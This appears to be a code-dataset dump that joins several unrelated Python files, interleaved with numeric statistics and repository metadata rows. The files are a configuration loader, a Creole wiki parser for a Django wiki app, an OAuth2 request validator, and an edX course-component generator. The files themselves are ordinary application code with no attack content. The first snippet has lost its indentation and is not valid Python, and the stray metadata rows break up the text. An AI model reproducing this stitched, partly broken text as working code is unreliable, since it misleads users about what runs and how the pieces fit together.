def setup_config(app_env, app_kind, conf_dir):
if "--" in sys.argv:
args = sys.argv[sys.argv.index("--") + 1:]
else:
args = []
common_config_file = os.path.join(conf_dir, "etc/{}/common.conf".format(app_env))
default_config_files = [common_config_file]
app_config_file = os.path.join(conf_dir, "etc/{}/{}.conf".format(app_env, app_kind))
default_config_files.append(app_config_file)
CONF(default_config_files=default_config_files, args=args)
class Config(object):
def __init__(self, app_env, app_kind, conf_dir):
# print 'conf_dir: ', conf_dir
if "--" in sys.argv:
args = sys.argv[sys.argv.index("--") + 1:]
else:
args = []
common_config_file = os.path.join(conf_dir, "etc/{}/common.conf".format(app_env))
default_config_files = [common_config_file]
app_config_file = os.path.join(conf_dir, "etc/{}/{}.conf".format(app_env, app_kind))
default_config_files.append(app_config_file)
CONF(default_config_files=default_config_files, args=args)
self.SECRET_KEY = os.environ.get('SECRET_KEY') or CONF.etc.secret_key
self.SQLALCHEMY_DATABASE_URI = CONF.DB.connection
self.SQLALCHEMY_TRACK_MODIFICATIONS = False
self.PERMANENT_SESSION_LIFETIME = timedelta(days=1)
# SECRET_KEY = os.environ.get('SECRET_KEY') or CONF.etc.secret_key
# SQLALCHEMY_DATABASE_URI = CONF.DB.connection
# SQLALCHEMY_TRACK_MODIFICATIONS = False
# PERMANENT_SESSION_LIFETIME = timedelta(days=1)
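# A minimal usage sketch for the helpers above, assuming a hypothetical
# conf_dir that contains etc/dev/common.conf and etc/dev/web.conf; the
# 'dev'/'web' names are placeholders, not values required by this module.
if __name__ == "__main__":
    conf_dir = os.path.dirname(os.path.abspath(__file__))
    setup_config(app_env='dev', app_kind='web', conf_dir=conf_dir)
    config = Config(app_env='dev', app_kind='web', conf_dir=conf_dir)
    print(config.SQLALCHEMY_DATABASE_URI)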
| 31.160584
| 92
| 0.594284
| 524
| 4,269
| 4.662214
| 0.28626
| 0.099468
| 0.052395
| 0.062219
| 0.417519
| 0.345886
| 0.270978
| 0.270978
| 0.270978
| 0.270978
| 0
| 0.008184
| 0.255798
| 4,269
| 136
| 93
| 31.389706
| 0.760781
| 0.057625
| 0
| 0.288288
| 0
| 0
| 0.229084
| 0.006972
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018018
| false
| 0
| 0.036036
| 0
| 0.063063
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136335a62a6f24cad26390348c87d9d3bbbba896
| 14,534
|
py
|
Python
|
aswiki/parser.py
|
scanner/django-aswiki
|
318908eeccc8da324846ac5ffc4d4a206f560521
|
[
"BSD-3-Clause"
] | null | null | null |
aswiki/parser.py
|
scanner/django-aswiki
|
318908eeccc8da324846ac5ffc4d4a206f560521
|
[
"BSD-3-Clause"
] | 1
|
2020-09-25T05:40:38.000Z
|
2020-09-28T05:41:27.000Z
|
aswiki/parser.py
|
scanner/django-aswiki
|
318908eeccc8da324846ac5ffc4d4a206f560521
|
[
"BSD-3-Clause"
] | null | null | null |
#
# File: $Id: parser.py 1865 2008-10-28 00:47:27Z scanner $
#
"""
This is where the logic and definition of our wiki markup parser lives.
We use the Python Creoleparser (which requires Genshi)
We make a custom dialect so that the parser can know the URL base for
all of the topics (pages) in the wiki and some additional goop so that
we can tell what other topics a given topic refers to.
"""
# system imports
#
from urllib import quote
from urlparse import urlparse
try:
import threading
except ImportError:
import dummy_threading as threading
# Django imports
#
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
# 3rd party imports
#
from creoleparser.dialects import create_dialect, creole10_base, creole11_base
from creoleparser.core import Parser
from genshi import builder
# We see if we have the 'typogrify' app installed. If we do we will
# use it for rendering our templates to prettify them a bit.
#
try:
from typogrify.templatetags.typogrify import typogrify
except ImportError:
def typogrify(text):
return text
# Model imports
#
from aswiki.models import Topic
############################################################################
############################################################################
#
class TopicList(object):
"""
A helper class we use to keep track of all of the topics that are
    referenced by the raw content for a specific topic. We pass this
    object's 'path_fn' method into the 'path_func' parameter of the
    creole dialect we are going to generate.
The point of this class is that we need to know what topics are
referenced by a specific topic when its content is created or
modified. This lets us know that list of topics by their topic
names.
"""
########################################################################
#
def __init__(self):
"""
Very plain init. We set up the attribute for tracking topics.
"""
# The current topic that is being rendered, if we know it. This
# lets us root image url's relative to this topic.
#
self.current_topic = None
# The list of topics that we have encountered while rendering
# some content. This should be reset between renders.
#
self.topics = []
# A dict mapping the lower case topic name to the original case used
# in the text being parsed. This is so we can preserve the case
# when doing things like creating nascent topics.
#
self.topics_case = { }
# This is another list. It contains Topic's that we have
# found this topic referring to not via [[wiki links]] but via
# other methods like the <<subtopics >> macro. We need this so
# that when we are done rendering we can find out what other topics
# we should list in this topic's references.
#
self.extra_references = []
# This is a bit of ugliness. Since we instantiate a TopicList and pass
# a method when we create an instance of a Creole _dialect_ this one
# instance will be shared across this process instance which may well
# exist across multiple calls to render text via the parser generated
# from the dialect, which means our list of topics will grow every
# time we render a document.
#
# However, this is a problem since for our current use we only want
# the topic names from rendering a single topic. So we have to make
# sure no other thread of execution (if there are other threads
# running.. if not this is a cheap operation.. XXX I think) modifies
# the topic list we have to provide a mutex so only one thread at a
# time can add topics to a topic list.
#
self.lock = threading.Lock()
return
########################################################################
#
def clear_and_lock(self):
"""
Locks the mutex to prevent conflicts on updating the topic list if
more then one thread tries to render using the same dialect instance
at the same time.
"""
self.lock.acquire()
self.topics = []
self.topics_case = { }
self.extra_references = []
return
########################################################################
#
def unlock(self):
"""
Unlocks the mutex. Do NOT access the topics parameter after this is
called. You can not be guaranteed whose list of topics you are seeing.
"""
self.lock.release()
return
##################################################################
#
def image_fn(self, image_name):
"""
This is called by our creole parser every time it hits an
image link. This lets us translate image names to be relative
to the topic they are found in as appropriate.
We only apply this magic transformation for images url's that
are relative.
Arguments:
- `image_name`: The name of the image being referenced.
"""
# If the image url is NOT absolute, root it relative to this
# topic.
#
u = urlparse(image_name)
if self.current_topic and len(u.path) > 0 and u.path[0] != "/":
return self.current_topic + "/" + image_name
return image_name
########################################################################
#
def path_fn(self, topic_name):
"""
This is called by our creole parser every time it encounters a
wiki link in the text it is parsing. This lets us track which
topics this text refers to.
We are passed in a topic name, and we return that topic
name.. if we were doing some sort of transformation on topic
names this is where it would happen.
Arguments:
- `topic_name`: The topic name being referenced as a wiki link.
"""
lower_topic_name = topic_name.lower()
# if this is a topic name we have not seen yet, add it to our list
# of topics.
#
if lower_topic_name not in self.topics:
self.topics.append(lower_topic_name)
self.topics_case[lower_topic_name] = topic_name
return topic_name
############################################################################
#
def class_fn(topic_name):
"""
This function is invoked by the markup dialect every time it encounters a
wiki topic. It returns a string that is the css class name to add to wiki
links as they are turned in to proper <a href></a> links.
We use this as a way to annotate topics that do not exist yet with some
graphical attribute so that users can easily tell which topics are not yet
created.
We use the wiki.models.TopicManager's css_class_name method to do this
lookup.
NOTE: Since this module is imported by the wiki.models module we need to
import that module inside here so that we can access the Topic
model. This is cheap since it will already be imported.
Arguments:
- `topic_name`: the topic name being checked for existence.
"""
# XXX This is where we should do a cache lookup of the topic name
# and only if that fails fall back to
# Topic.objects.css_class_name(topic_name)
#
return Topic.objects.css_class_name(topic_name)
####################################################################
#
def output_mailto(arg_string):
"""
Given the arguments of an anchor macro output the proper genshi
stream that will render a mailto link. We also need to support the magic
argument string format of '<you> AT <word> AT <foo> DOT <foo>'
Arguments:
- `arg_string`: The argument string of the anchor macro.
- `macro_body`: The macro body if provided
- `block_type`: True if this is a block macro.
"""
# XXX Need to support the fancy format.. but for now just get the basic
# working.
return builder.tag.a(arg_string, href="mailto:%s" % arg_string)
####################################################################
#
def output_subtopics(arg_string):
"""
This will take a single string as its input. It will find all
topics for which the string as a topic name is the parent topic.
There is some semantic magic in a topic if it contains periods, ie: the
'.' character. This forms a kind of hierarchy. Loosely speaking all topics
that start with the same prefix, separated by '.' are sub-topics.
So: 2007.Agenda is a sub-topic of 2007. 2007.Agenda.foo is a subtopic of
2007 and 2007.Agenda.
This macro will insert in to the output <ul> of the topics that are proper
subtopics of the given string, ordered by name. So in the above example if
I were to say <<subtopics 2007>> it would give me "2007.Agenda" and
"2007.Agenda.foo" in a <ul>
If the arg string ends with a dot, then it is treated as the
separator. ie: <<subtopics 2007.>> and <<subtopics 2007>> are identical.
Arguments:
- `arg_string`: The topic we want to find all subtopics of.
"""
arg_string = arg_string
if arg_string[-1] != '.':
arg_string = arg_string + "."
topics = Topic.objects.filter(lc_name__istartswith = arg_string.lower()).order_by('lc_name')
if topics.count() == 0:
return None
ul = builder.tag.ul()
# For every topic that matches our pattern we insert a 'li' link
# to that topic in our output. We also add this topic to the
# 'extra_references' list in our global TOPIC_LIST object. This is
# so that the prerender../save() methods of the Topic object we are
# rendering this output for can know to add those topics to the list
# of topics referenced by the topic being rendered.
for topic in topics:
TOPIC_LIST.extra_references.append(topic)
ul.append(builder.tag.li(builder.tag.a(topic.name,
href = topic.get_absolute_url())))
return ul
####################################################################
#
def output_attachments(arg_string):
"""
Returns a <ul> of all of the attachments attached to the topic name
given as the arg_string.
Arguments:
- `arg_string`: Expected to be the name of a topic. If no such topic
exist, then no attachment list is generated.
"""
try:
topic = Topic.objects.get(lc_name = arg_string.lower())
except Topic.DoesNotExist:
return None
ul = builder.tag.ul()
# For every file attachment on this topic, add a 'li' link
# to that attachment.
#
for attachment in topic.file_attachments.all():
ul.append(builder.tag.li(builder.tag.a(attachment.basename(),
href = attachment.get_absolute_url())))
return ul
####################################################################
#
def macro_fn(name, arg_string, macro_body, block_type, environ):
"""
Handles the macros we define for our version of markup.
Arguments:
- `name`: The name of the macro
- `arg_string`: The argument string, including any delimiters
- `macro_body`: The macro body, None for macro with no body.
- `block_type`: True for block type macros.
- `environ` : The environment object, passed through from
creoleparser.core.Parser class's 'parse()' method.
"""
name = name.strip().lower()
arg_string = arg_string.strip()
if name == 'anchor':
if block_type:
return builder.tag.a(macro_body, name = arg_string)
else:
return builder.tag.a(name = arg_string)
elif name == 'mailto':
return output_mailto(arg_string)
elif name == 'gettext':
if block_type:
return _(macro_body)
else:
return _(arg_string)
elif name == 'subtopics':
return output_subtopics(arg_string)
elif name == 'attachlist':
return output_attachments(arg_string)
elif name == 'attachment':
# For including downloadable attachments in a wiki document.
if block_type:
return builder.tag.a(macro_body, href=arg_string)
else:
return builder.tag.a(arg_string, href=arg_string)
return None
##
## Create our custom dialect. It will use our class function and a TopicList
## instance. The root URL for all wiki topics will be the same as the
## 'aswiki_topic_index' url.
##
## NOTE: This assumes that the url for a specific Topic is the same as the url
## for the aswiki_topic_index with the Topic name appended to it
##
TOPIC_LIST = TopicList()
# dialect = creoleparser.dialects.Creole10(
# wiki_links_base_url = reverse('aswiki_topic_index'),
# wiki_links_space_char = '%20',
# use_additions = True,
# no_wiki_monospace = False,
# wiki_links_class_func = class_fn,
# wiki_links_path_func = TOPIC_LIST.path_fn,
# macro_func = macro_fn,
# interwiki_links_base_urls=dict(wikicreole='http://wikicreole.org/wiki/',
# wikipedia='http://wikipedia.org/wiki/',)
# )
parser = Parser(dialect = create_dialect(\
creole11_base,
wiki_links_base_url = reverse('aswiki_topic_index'), # NOTE: Make this
# a two element
# list for images
# to be loaded
# from a separate
# URL
wiki_links_space_char = '%20', # NOTE: make this a two element list to
# give images a different space
# character.
no_wiki_monospace = False,
wiki_links_class_func = class_fn,
wiki_links_path_func = (TOPIC_LIST.path_fn,
TOPIC_LIST.image_fn),
bodied_macros = { },
non_bodied_macros = { },
macro_func = macro_fn,
# custom_markup = (),
interwiki_links_base_urls = {
'wikicreole' : 'http://wikicreole.org/wiki/',
'wikipedia' :'http://wikipedia.org/wiki/' }
))
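# A minimal rendering sketch that follows the locking discipline described in
# the TopicList docstrings above; the render_topic name and calling pattern are
# illustrative, and a configured Django project (providing the
# 'aswiki_topic_index' URL and the aswiki.models.Topic model) is assumed.
def render_topic(topic_name, raw_markup):
    # Serialize access to the shared TOPIC_LIST, render the markup, and return
    # the HTML plus the topics it references.
    TOPIC_LIST.clear_and_lock()
    try:
        TOPIC_LIST.current_topic = topic_name
        html = parser(raw_markup)
        referenced = list(TOPIC_LIST.topics)
    finally:
        TOPIC_LIST.unlock()
    return html, referenced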
| 37.848958
| 96
| 0.597083
| 1,922
| 14,534
| 4.420916
| 0.221124
| 0.031776
| 0.009062
| 0.010004
| 0.154761
| 0.120513
| 0.109803
| 0.075321
| 0.051312
| 0.042603
| 0
| 0.007177
| 0.280996
| 14,534
| 383
| 97
| 37.947781
| 0.805933
| 0.543828
| 0
| 0.238938
| 0
| 0
| 0.031482
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097345
| false
| 0
| 0.115044
| 0.00885
| 0.424779
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1365f047bda189ac06139ef3c589483027732b74
| 13,825
|
py
|
Python
|
oauth_api/validators.py
|
anobi/django-oauth-api
|
95bf9b500dab326553a5a8a17d5c6da1a34f6ac4
|
[
"BSD-2-Clause"
] | null | null | null |
oauth_api/validators.py
|
anobi/django-oauth-api
|
95bf9b500dab326553a5a8a17d5c6da1a34f6ac4
|
[
"BSD-2-Clause"
] | null | null | null |
oauth_api/validators.py
|
anobi/django-oauth-api
|
95bf9b500dab326553a5a8a17d5c6da1a34f6ac4
|
[
"BSD-2-Clause"
] | 4
|
2015-07-30T11:03:54.000Z
|
2017-11-13T15:30:48.000Z
|
import base64
import binascii
from datetime import timedelta
from django.contrib.auth import authenticate
from django.utils import timezone
from oauthlib.oauth2 import RequestValidator
from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication
from oauth_api.settings import oauth_api_settings
GRANT_TYPE_MAPPING = {
'authorization_code': (AbstractApplication.GRANT_AUTHORIZATION_CODE,),
'password': (AbstractApplication.GRANT_PASSWORD,),
'client_credentials': (AbstractApplication.GRANT_CLIENT_CREDENTIALS,),
'refresh_token': (AbstractApplication.GRANT_AUTHORIZATION_CODE, AbstractApplication.GRANT_PASSWORD,
AbstractApplication.GRANT_CLIENT_CREDENTIALS)
}
class OAuthValidator(RequestValidator):
def _get_application(self, client_id, request):
"""
Load application instance for given client_id and store it in request as 'client' attribute
"""
assert hasattr(request, 'client'), "'client' attribute missing from 'request'"
Application = get_application_model()
try:
request.client = request.client or Application.objects.get(client_id=client_id)
return request.client
except Application.DoesNotExist:
return None
def _get_auth_string(self, request):
auth = request.headers.get('HTTP_AUTHORIZATION', None)
if not auth:
return None
splitted = auth.split(' ', 1)
if len(splitted) != 2:
return None
auth_type, auth_string = splitted
if auth_type != 'Basic':
return None
return auth_string
def _authenticate_client_basic(self, request):
"""
Try authenticating the client using HTTP Basic Authentication method
"""
auth_string = self._get_auth_string(request)
if not auth_string:
return False
try:
encoding = request.encoding or 'utf-8'
except AttributeError:
encoding = 'utf-8'
try:
b64_decoded = base64.b64decode(auth_string)
except (TypeError, binascii.Error):
return False
try:
auth_string_decoded = b64_decoded.decode(encoding)
except UnicodeDecodeError:
return False
client_id, client_secret = auth_string_decoded.split(':', 1)
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def _authenticate_client_body(self, request):
"""
Try authenticating the client using values from request body
"""
try:
client_id = request.client_id
client_secret = request.client_secret
except AttributeError:
return False
if not client_id:
return False
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def client_authentication_required(self, request, *args, **kwargs):
"""
Determine if client authentication is required for current request.
According to the rfc6749, client authentication is required in the following cases:
- Resource Owner Password Credentials Grant, when Client type is Confidential or when
Client was issued client credentials or whenever Client provided client
authentication, see `Section 4.3.2`_.
- Authorization Code Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication,
see `Section 4.1.3`_.
- Refresh Token Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication, see
`Section 6`_
:param request: oauthlib.common.Request
:return: True or False
"""
if self._get_auth_string(request):
return True
try:
if request.client_id and request.client_secret:
return True
except AttributeError:
# Client id or secret not provided
pass
self._get_application(request.client_id, request)
if request.client:
return request.client.client_type == AbstractApplication.CLIENT_CONFIDENTIAL
return super(OAuthValidator, self).client_authentication_required(request, *args, **kwargs)
def authenticate_client(self, request, *args, **kwargs):
"""
Try to authenticate the client.
"""
authenticated = self._authenticate_client_basic(request)
if not authenticated:
authenticated = self._authenticate_client_body(request)
return authenticated
def authenticate_client_id(self, client_id, request, *args, **kwargs):
"""
Ensure client_id belong to a non-confidential client.
A non-confidential client is one that is not required to authenticate through other means, such as using HTTP Basic.
"""
if self._get_application(client_id, request) is not None:
return request.client.client_type != AbstractApplication.CLIENT_CONFIDENTIAL
return False
def confirm_redirect_uri(self, client_id, code, redirect_uri, client, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
auth_code = AuthorizationCode.objects.get(application=client, code=code)
return auth_code.redirect_uri_allowed(redirect_uri)
def get_default_redirect_uri(self, client_id, request, *args, **kwargs):
"""
Get the default redirect URI for the client.
"""
return request.client.default_redirect_uri
def get_default_scopes(self, client_id, request, *args, **kwargs):
"""
Get the default scopes for the client.
"""
return list(oauth_api_settings.SCOPES.keys())
def get_original_scopes(self, refresh_token, request, *args, **kwargs):
"""
Get the list of scopes associated with the refresh token.
"""
return request.refresh_token_object.access_token.scope
def invalidate_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Invalidate an authorization code after use.
"""
auth_code = AuthorizationCode.objects.get(application=request.client, code=code)
auth_code.delete()
def save_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Persist the authorization_code.
"""
expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
AuthorizationCode.objects.create(
application=request.client,
user=request.user,
code=code['code'],
expires=expires,
redirect_uri=request.redirect_uri,
scope=' '.join(request.scopes)
)
return request.redirect_uri
def save_bearer_token(self, token, request, *args, **kwargs):
"""
Persist the Bearer token.
"""
if request.refresh_token:
# Revoke Refresh Token (and related Access Token)
try:
RefreshToken.objects.get(token=request.refresh_token).revoke()
except RefreshToken.DoesNotExist:
# Already revoked?
pass
expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
user = request.user
if request.grant_type == 'client_credentials':
user = None
access_token = AccessToken.objects.create(
user=user,
scope=token['scope'],
expires=expires,
token=token['access_token'],
application=request.client
)
if 'refresh_token' in token:
if oauth_api_settings.REFRESH_TOKEN_EXPIRATION is not None:
expires = timezone.now() + timedelta(seconds=oauth_api_settings.REFRESH_TOKEN_EXPIRATION)
else:
expires = None
RefreshToken.objects.create(
user=request.user,
token=token['refresh_token'],
expires=expires,
application=request.client,
access_token=access_token
)
return request.client.default_redirect_uri
def revoke_token(self, token, token_type_hint, request, *args, **kwargs):
"""
Revoke an access or refresh token.
:param token: The token string.
:param token_type_hint: access_token or refresh_token.
:param request: The HTTP Request (oauthlib.common.Request)
"""
if token_type_hint not in ['access_token', 'refresh_token']:
token_type_hint = None
token_types = {
'access_token': AccessToken,
'refresh_token': RefreshToken,
}
token_type = token_types.get(token_type_hint, AccessToken)
try:
token_type.objects.get(token=token, application=request.client).revoke()
except token_type.DoesNotExist:
# Lookup from all token types except from already looked up type
other_types = (_type for _type in token_types.values() if _type != token_type)
for other_type in other_types:
for token in other_type.objects.filter(token=token, application=request.client):
token.revoke()
def validate_bearer_token(self, token, scopes, request):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
if token is None:
return False
try:
access_token = AccessToken.objects.select_related('application', 'user').get(token=token)
if access_token.is_valid(scopes):
request.client = access_token.application
request.user = access_token.user
request.scopes = scopes
# Required when authenticating using OAuth2Authentication
request.access_token = access_token
return True
return False
except AccessToken.DoesNotExist:
return False
def validate_client_id(self, client_id, request, *args, **kwargs):
"""
        Check that an Application exists with the given client_id.
"""
return self._get_application(client_id, request) is not None
def validate_code(self, client_id, code, client, request, *args, **kwargs):
"""
Ensure the authorization_code is valid and assigned to client.
"""
try:
auth_code = AuthorizationCode.objects.select_related('user').get(application=client, code=code)
if not auth_code.is_expired:
request.scopes = auth_code.scope.split(' ')
request.user = auth_code.user
return True
return False
except AuthorizationCode.DoesNotExist:
return False
def validate_grant_type(self, client_id, grant_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the grant_type requested.
"""
assert (grant_type in GRANT_TYPE_MAPPING)
return request.client.authorization_grant_type in GRANT_TYPE_MAPPING[grant_type]
def validate_redirect_uri(self, client_id, redirect_uri, request, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
return request.client.redirect_uri_allowed(redirect_uri)
def validate_refresh_token(self, refresh_token, client, request, *args, **kwargs):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
try:
rt = RefreshToken.objects.select_related('user').get(token=refresh_token)
if not rt.is_expired:
request.user = rt.user
request.refresh_token = rt.token
request.refresh_token_object = rt
return rt.application == client
return False
except RefreshToken.DoesNotExist:
return False
def validate_response_type(self, client_id, response_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the response_type requested.
Authorization Endpoint Response Types registry is not supported.
See http://tools.ietf.org/html/rfc6749#section-8.4
"""
if response_type == 'code':
return client.authorization_grant_type == AbstractApplication.GRANT_AUTHORIZATION_CODE
elif response_type == 'token':
return client.authorization_grant_type == AbstractApplication.GRANT_IMPLICIT
else:
return False
def validate_scopes(self, client_id, scopes, client, request, *args, **kwargs):
"""
Ensure the client is authorized access to requested scopes.
"""
return set(scopes).issubset(set(oauth_api_settings.SCOPES.keys()))
def validate_user(self, username, password, client, request, *args, **kwargs):
"""
Ensure the username and password is valid.
"""
user = authenticate(username=username, password=password)
if user is not None and user.is_active:
request.user = user
return True
return False
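# A minimal wiring sketch showing how a RequestValidator like the one above is
# typically handed to an oauthlib core endpoint; WebApplicationServer is one of
# several possible endpoint bundles, and the surrounding Django view plumbing
# is intentionally not shown.
from oauthlib.oauth2 import WebApplicationServer

def build_oauth_server():
    validator = OAuthValidator()
    # WebApplicationServer wraps the authorization-code and bearer-token
    # endpoints around a single RequestValidator implementation.
    return WebApplicationServer(validator)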
| 37.364865
| 124
| 0.636166
| 1,495
| 13,825
| 5.694983
| 0.133779
| 0.029128
| 0.037938
| 0.021611
| 0.352831
| 0.281536
| 0.229035
| 0.196148
| 0.180526
| 0.132135
| 0
| 0.003456
| 0.288318
| 13,825
| 369
| 125
| 37.466125
| 0.861876
| 0.189078
| 0
| 0.307339
| 0
| 0
| 0.027343
| 0
| 0
| 0
| 0
| 0
| 0.009174
| 1
| 0.110092
| false
| 0.027523
| 0.036697
| 0
| 0.376147
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1366f50a70db89f7b6f66ff4d8a7cc0516afcf2f
| 6,471
|
py
|
Python
|
edx_gen/_write_comps.py
|
hberndl70/mooc-generator
|
58ff77ece12b456887ec24db79d8baa87ecd5621
|
[
"MIT"
] | null | null | null |
edx_gen/_write_comps.py
|
hberndl70/mooc-generator
|
58ff77ece12b456887ec24db79d8baa87ecd5621
|
[
"MIT"
] | null | null | null |
edx_gen/_write_comps.py
|
hberndl70/mooc-generator
|
58ff77ece12b456887ec24db79d8baa87ecd5621
|
[
"MIT"
] | null | null | null |
import sys, os
import tarfile
import shutil
from edx_gen import _edx_consts
from edx_gen import _read_metadata
from edx_gen import _write_structure
from edx_gen import _write_comps
from edx_gen import _write_comp_html
from edx_gen import _write_comp_checkboxes
from edx_gen import _write_comp_video
from edx_gen import _xml_google_doc
from edx_gen import _markdown
from edx_gen import _util
import __SETTINGS__
#--------------------------------------------------------------------------------------------------
# Text strings
WARNING = " WARNING:"
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def writeCompsForUnit(md_filepath, unit_filename):
# print("component_path", component_path)
# generate the files in the right folders
tree_snippets = _markdown.convertMd(md_filepath)
# check we have at least 2 snippets, the header and one component
if len(tree_snippets) <= 1:
print(WARNING, 'The markdown file does not seem to contain any components:', md_filepath)
return []
# get the display name of the unit
first_h1_tag = list(tree_snippets[0].iter('h1'))[0]
unit_display_name = first_h1_tag.get('display_name')
# list to store all files
unit_comps = []
# process components
for i in range(1, len(tree_snippets)):
tree_snippet = tree_snippets[i]
# generate the files
new_filename = unit_filename + '_c' + str(i)
comp_files = _writeFilesForSnippet(md_filepath, new_filename, tree_snippet, unit_filename, unit_display_name)
unit_comps.extend(comp_files)
# return the result
return unit_comps
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def _writeFilesForSnippet(md_filepath, comp_filename, tree_snippet, unit_filename, unit_display_name):
meta_tag = None
comp_type = None
# meta_text = None
# get the h1 tags
h1_tags = list(tree_snippet.iter('h1'))
if len(h1_tags) == 0:
print(WARNING, 'The snippet does not start with any settings:', md_filepath)
return []
# get the meta tag for the snippet
meta_tag = h1_tags[0]  # the first h1 should contain the meta data
# # check the meta tag text
# meta_text = meta_tag.text.strip()
# if meta_text == None or meta_text != 'UNIT':
# print(WARNING, 'The markdown file must start with the "UNIT" settings:', component_path)
# print(WARNING, 'Make sure that the first line of the markdown file is blank')
# get the type for this component
comp_type = meta_tag.get('type')
if comp_type is None or comp_type not in _edx_consts.METADATA_ENUMS['type']:
print(WARNING, 'The "type" setting is not recognised:', md_filepath)
print(WARNING, ' Found:', comp_type)
print(WARNING, ' Valid options:', _edx_consts.METADATA_ENUMS['type'])
# write xml and/or html files
if comp_type == 'html':
print(" |_ HTML COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_HTML_REQ, _edx_consts.COMP_HTML_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "html" component:', md_filepath)
return []
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_html.writeXmlForHtmlComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'problem-checkboxes':
print(" |_ PROBLEM CHECKBOXES")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_PROB_QUIZ_REQ, _edx_consts.COMP_PROB_QUIZ_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "problem-checkboxes" component:', md_filepath)
return []
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_PROBS_FOLDER
# return the list of files
return _write_comp_checkboxes.writeXmlForProbCheckboxesComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'video':
print(" |_ VIDEO COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(
md_filepath, meta_tag, _edx_consts.COMP_VIDEO_REQ, _edx_consts.COMP_VIDEO_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "video" component:', md_filepath)
return []
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_VIDS_FOLDER
# for each language
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_video.writeXmlForVidComp(
md_filepath, comp_filename, settings, unit_filename)
elif comp_type == 'google-doc':
print(" |_ GOOGLE DOC COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_GOOGLE_DOC_REQ, _edx_consts.COMP_GOOGLE_DOC_OPT)
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "Google Doc" component:', md_filepath)
return []
# in this case, no files are written
# we return the component tag instead
return _xml_google_doc.tagForGoogleDocComp(comp_filename, settings, unit_filename)
else:
print(WARNING, 'Component type not recognised:', comp_type, "in", md_filepath)
return []
#--------------------------------------------------------------------------------------------------
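# Illustrative summary (not part of the original module): _writeFilesForSnippet
# dispatches on the 'type' setting of each snippet's first h1 tag:
#   'html'                -> _write_comp_html.writeXmlForHtmlComp(...)
#   'problem-checkboxes'  -> _write_comp_checkboxes.writeXmlForProbCheckboxesComp(...)
#   'video'               -> _write_comp_video.writeXmlForVidComp(...)
#   'google-doc'          -> _xml_google_doc.tagForGoogleDocComp(...)  (returns a tag; writes no files)
# Unrecognised types only produce a warning and return an empty list.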
| 38.064706
| 117
| 0.641323
| 842
| 6,471
| 4.667458
| 0.17696
| 0.035623
| 0.025445
| 0.040712
| 0.50687
| 0.442748
| 0.411959
| 0.411959
| 0.38855
| 0.378117
| 0
| 0.003841
| 0.235667
| 6,471
| 169
| 118
| 38.289941
| 0.79074
| 0.324679
| 0
| 0.209877
| 0
| 0
| 0.138426
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024691
| false
| 0
| 0.17284
| 0
| 0.308642
| 0.17284
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
